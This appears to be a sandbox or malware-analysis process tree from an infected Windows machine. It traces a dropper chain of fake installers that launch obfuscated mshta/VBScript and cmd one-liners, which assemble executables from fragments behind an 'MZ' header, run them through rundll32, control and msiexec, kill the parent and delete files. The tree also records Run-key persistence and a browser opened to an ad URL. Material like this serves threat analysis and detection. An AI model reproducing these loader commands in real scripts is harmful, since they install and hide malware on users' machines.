C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"14⤵PID:9100
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )13⤵PID:6248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *14⤵PID:1796
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"15⤵PID:5388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "15⤵PID:7020
-
-
C:\Windows\SysWOW64\control.execontrol ..\WfNRfms4.K15⤵PID:1252
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K16⤵
- Loads dropped DLL
PID:5076 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K17⤵PID:6432
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K18⤵
- Loads dropped DLL
PID:2664
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -Im "8736505.exe"12⤵
- Kills process with taskkill
PID:7636
-
-
-
-
-
C:\Users\Admin\AppData\Local\2208308.exe"C:\Users\Admin\AppData\Local\2208308.exe"9⤵
- Suspicious behavior: SetClipboardViewer
PID:9052
-
-
C:\Users\Admin\AppData\Local\4140920.exe"C:\Users\Admin\AppData\Local\4140920.exe"9⤵PID:8756
-
-
-
C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"8⤵PID:2200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 2969⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7892
-
-
-
C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"8⤵PID:5056
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\is-BERNV.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BERNV.tmp\setup.tmp" /SL5="$2039C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"9⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\is-TAIG8.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TAIG8.tmp\setup.tmp" /SL5="$40416,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT11⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7872 -
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart12⤵PID:8812
-
C:\c80b4ce618f2b22e9b\Setup.exeC:\c80b4ce618f2b22e9b\\Setup.exe /q /norestart /x86 /x64 /web13⤵
- Loads dropped DLL
- Checks processor information in registry
PID:2948
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss112⤵PID:8804
-
-
C:\Users\Admin\AppData\Local\Temp\is-EKSL5.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EKSL5.tmp\postback.exe" ss112⤵PID:8748
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵PID:6708
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:6784
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:7548
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵PID:6684
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵PID:3460
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:2468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5628
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵PID:8080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:3740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:7688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:5432
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵PID:4680
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵PID:1364
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"8⤵PID:6176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 17529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4540
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
PID:5984 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 2969⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵PID:6972
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:2644 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"10⤵PID:2824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"8⤵PID:7496
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7496 -s 19529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8636
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"8⤵PID:8104
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵PID:1064
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1064 -s 19689⤵
- Program crash
PID:4732
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1064 -s 19689⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8696
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"C:\Users\Admin\Pictures\Adobe Films\IjhdP4nV_bnmATIamZ0oM7vu.exe"7⤵
- Drops file in Program Files directory
PID:6976 -
C:\Users\Admin\Documents\J93t50WbZcEhobrEuzxKPi4w.exe"C:\Users\Admin\Documents\J93t50WbZcEhobrEuzxKPi4w.exe"8⤵PID:7588
-
C:\Users\Admin\Pictures\Adobe Films\CPxLcn3HuVhrSf5EK9J2XoM6.exe"C:\Users\Admin\Pictures\Adobe Films\CPxLcn3HuVhrSf5EK9J2XoM6.exe"9⤵PID:2200
-
-
C:\Users\Admin\Pictures\Adobe Films\eKOUrhDqulq3zBw4nSBt_xFz.exe"C:\Users\Admin\Pictures\Adobe Films\eKOUrhDqulq3zBw4nSBt_xFz.exe"9⤵PID:8960
-
-
C:\Users\Admin\Pictures\Adobe Films\w_NTBuKInq4mhHVl5osl1CHj.exe"C:\Users\Admin\Pictures\Adobe Films\w_NTBuKInq4mhHVl5osl1CHj.exe"9⤵PID:8924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8924 -s 27610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5316
-
-
-
C:\Users\Admin\Pictures\Adobe Films\H5g745DD4zaGI4veDHXuzIg9.exe"C:\Users\Admin\Pictures\Adobe Films\H5g745DD4zaGI4veDHXuzIg9.exe"9⤵
- Loads dropped DLL
PID:9208 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5360 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"11⤵
- Suspicious use of FindShellTrayWindow
PID:6540 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff86f36dec0,0x7ff86f36ded0,0x7ff86f36dee012⤵PID:6464
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2256 /prefetch:812⤵PID:4728
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2244 /prefetch:812⤵PID:6036
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:212⤵PID:5996
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2556 /prefetch:112⤵PID:6188
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2576 /prefetch:112⤵PID:7116
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2948 /prefetch:812⤵PID:6628
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:212⤵
- Modifies registry class
PID:7896
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2032 /prefetch:812⤵PID:4060
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=3364 /prefetch:812⤵PID:2488
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=1512 /prefetch:812⤵PID:7088
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2032 /prefetch:812⤵PID:7436
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"9⤵PID:8296
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:8772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:6444
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "cmkbfDAd_miQBvOKH4Fe2TD_.exe"12⤵
- Kills process with taskkill
PID:6624
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\C0tgNAOxqaCNg3uOrAPJqEce.exe"C:\Users\Admin\Pictures\Adobe Films\C0tgNAOxqaCNg3uOrAPJqEce.exe"9⤵PID:9128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9128 -s 172410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9028
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"9⤵PID:8712
-
C:\Users\Admin\AppData\Local\Temp\is-N23A4.tmp\Pr94tBJFmmmBtB5jfTVqm8MB.tmp"C:\Users\Admin\AppData\Local\Temp\is-N23A4.tmp\Pr94tBJFmmmBtB5jfTVqm8MB.tmp" /SL5="$6050C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"10⤵
- Loads dropped DLL
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\is-GG4PD.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-GG4PD.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:1880 -
C:\Users\Admin\AppData\Local\Temp\e2-67f0b-c3a-d5aa5-8fcdac036f426\Baeqeloqeji.exe"C:\Users\Admin\AppData\Local\Temp\e2-67f0b-c3a-d5aa5-8fcdac036f426\Baeqeloqeji.exe"12⤵PID:5552
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6728 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86eec46f8,0x7ff86eec4708,0x7ff86eec471814⤵PID:7412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:214⤵PID:4192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:314⤵PID:7716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2112 /prefetch:114⤵PID:8308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:814⤵PID:2576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:114⤵PID:7424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:114⤵PID:5640
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1904 /prefetch:114⤵PID:8156
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:114⤵PID:4344
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:814⤵PID:8360
C:\Users\Admin\AppData\Local\Temp\1f-7a238-8ea-7cb8a-8761cb366a4fa\Cyfocypafi.exe"C:\Users\Admin\AppData\Local\Temp\1f-7a238-8ea-7cb8a-8761cb366a4fa\Cyfocypafi.exe"12⤵PID:3956
